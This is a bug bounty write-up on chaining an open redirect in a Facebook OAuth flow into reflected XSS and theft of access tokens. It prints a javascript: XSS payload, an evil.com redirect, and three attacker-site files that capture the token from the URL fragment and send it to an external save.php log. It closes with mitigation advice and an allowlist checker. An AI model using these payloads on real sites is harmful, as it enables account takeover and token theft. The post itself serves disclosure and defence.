Open Redirect > XSS > to Stealing Facebook Token


Bagas Rizki Gunardi

Hello Folks,
This is my first blog post about bug bounty hunting. I'm hunting on a private program here, so I won't leak the name of the program. Because I'm still learning how this website works, I explored it without Burp Suite; all I did was explore like an ordinary person opening a website: logging in to an account, uploading photos, viewing blogs on the website, etc.

After a bit of exploring, I found that the user account can connect to Facebook and LinkedIn. When I click it, it shows a URL like this:

https://redacted.com/oauth2/facebook?redirect_url=https://redacted.com/oauth2/facebook?redirect_url=https://www.facebook.com/dialog/oauth?client_id=xxxxx&redirect_uri=https%3A%2F%2Fredacted.com%2Foauth2%2Ffacebook&response_type=code&scope=email&display=popup&state=xxxxx

Because I found the redirect_url parameter, I tried for an Open Redirect vulnerability, https://redacted.com/oauth2/facebook?redirect_url=http://evil.com, and it worked. But the program said they don't accept Open Redirect vulnerabilities unless a sensitive action can be proven. So I thought, how about reflected XSS? The value lands in the redirect_url parameter, so the JavaScript code on the page should look like this:

<script>location = "http://url.com";</script>

I tried a simple XSS payload for location: javascript:alert(document.domain)


BOOM!

Reflected XSS fired. I wanted to report it immediately, but there was a blog post that stopped me from just reporting the XSS, because previously I had searched "open redirect on facebook oauth" on Google and found this post: https://abdilahrf.github.io/bugbounty/open-redirect-account-takeover-pada-bukalapak-com

I first studied how Abdillah Muhammad (the author) was able to steal a Facebook OAuth2 token with just an open redirect. After understanding it, since I didn't have a website, I made one at https://www.000webhost.com

I put 3 files on my website:

index.php (sends the browser into the Facebook OAuth dialog, with the target site's callback as redirect_uri and the hosted steal.html page as the nested redirect_url):

<?php
header("Location:https://www.facebook.com/v3.0/dialog/oauth?client_id=xxxxx&redirect_uri=https://redacted.com/oauth2/facebook?redirect_url=https://xxxxx.000webhostapp.com/steal.html&response_type=token&scope=email");
?>

steal.html (reads the token out of the URL fragment, sends it to save.php, then refreshes to the real site):

<h2>hack</h2>
<script>
// The implicit flow returns the token after '#', which only the browser sees.
let token = window.location.hash.slice(1);
const Http = new XMLHttpRequest();
const url = 'https://xxxxx.000webhostapp.com/save.php?data=' + token;
Http.open("GET", url);
Http.send();
Http.onreadystatechange = (e) => {
  console.log(Http.responseText);
};
</script>
<meta http-equiv="refresh" content="1; url=https://redacted.com" />

save.php (for saving the token to a specific path):

<?php
$file = fopen("token.txt", "a");
if (isset($_GET['data'])) {
    fwrite($file, $_GET['data']);
    fclose($file);
}
?>

After everything was prepared, it was time to act. The final payload is:

https://redacted.com/oauth2/facebook?redirect_url=https://xxxxx.000webhostapp.com/steal.html&response_type=token&scope=email

The token that arrives in token.txt can then be checked with Facebook's access token debugger:

https://developers.facebook.com/tools/debug/accesstoken/?access_token=TOKEN_HERE&version=v3.2

Mitigation

To prevent this vulnerability, whitelist the redirect URL on the server side, or change the configuration of the Facebook application so that it only accepts certain domains as callback targets for the OAuth token, and don't use a wildcard in the URL.
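The whitelist the mitigation describes is easy to get wrong, so here is an added example (my own code, not the program's or the post's) of a server-side check for the redirect_url parameter. It rejects each payload the post used: the plain open redirect to http://evil.com, the javascript: URL that fired the XSS, and the chained redirect to a third-party host. The host names redacted.com and www.redacted.com, the fallback URL and the hypothetical function name safe_redirect_url are assumptions standing in for the program's real values.

```python
# Added example (not from the original post): server-side allowlist check for an
# OAuth "redirect_url" parameter. Host names below are constructed placeholders.
from urllib.parse import urlsplit, urlunsplit

# Exact host names allowed to receive the post-login redirect (constructed).
ALLOWED_HOSTS = {"redacted.com", "www.redacted.com"}
# Where to send the user when the supplied value is rejected (constructed).
FALLBACK = "https://redacted.com/"


def safe_redirect_url(candidate, allowed_hosts=ALLOWED_HOSTS, fallback=FALLBACK):
    """Return `candidate` if it is an https URL on an allowed host, else `fallback`.

    The scheme check is what stops a javascript: value from ever reaching
    `location = "..."`; the exact-host check is what stops the open redirect.
    """
    if not isinstance(candidate, str) or not candidate:
        return fallback
    # Drop tabs/newlines/control chars: browsers ignore them inside "java\tscript:".
    cleaned = "".join(ch for ch in candidate if ch.isprintable()).strip()
    # Browsers treat backslash as a path separator; urlsplit does not. Refuse it.
    if "\\" in cleaned:
        return fallback
    try:
        parts = urlsplit(cleaned)
        port = parts.port  # may raise ValueError on a malformed port
    except ValueError:
        return fallback
    if parts.scheme.lower() != "https":  # rejects javascript:, data:, http:, "//host"
        return fallback
    if parts.username is not None or parts.password is not None:
        return fallback  # rejects https://redacted.com@evil.com/
    host = parts.hostname  # already lower-cased by urlsplit
    if host is None or host not in allowed_hosts:
        return fallback  # exact match, so redacted.com.evil.com is rejected
    if port not in (None, 443):
        return fallback
    # Rebuild from the parsed parts so the host that was checked is the one emitted.
    return urlunsplit(("https", host, parts.path or "/", parts.query, ""))


if __name__ == "__main__":
    # Values from the post plus a few common bypass attempts (all constructed).
    for value in [
        "http://evil.com",
        "javascript:alert(document.domain)",
        "https://xxxxx.000webhostapp.com/steal.html",
        "https://redacted.com@evil.com/",
        "https://redacted.com.evil.com/",
        "https://REDACTED.com/profile?x=1",
    ]:
        print(f"{value!r:50} -> {safe_redirect_url(value)}")
```

If the application also wants to accept site-relative paths such as /dashboard, add a branch that allows a value starting with a single "/" (and not "//") and prefixes the site's own origin; everything else should still fall back to the default page rather than being echoed into location.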
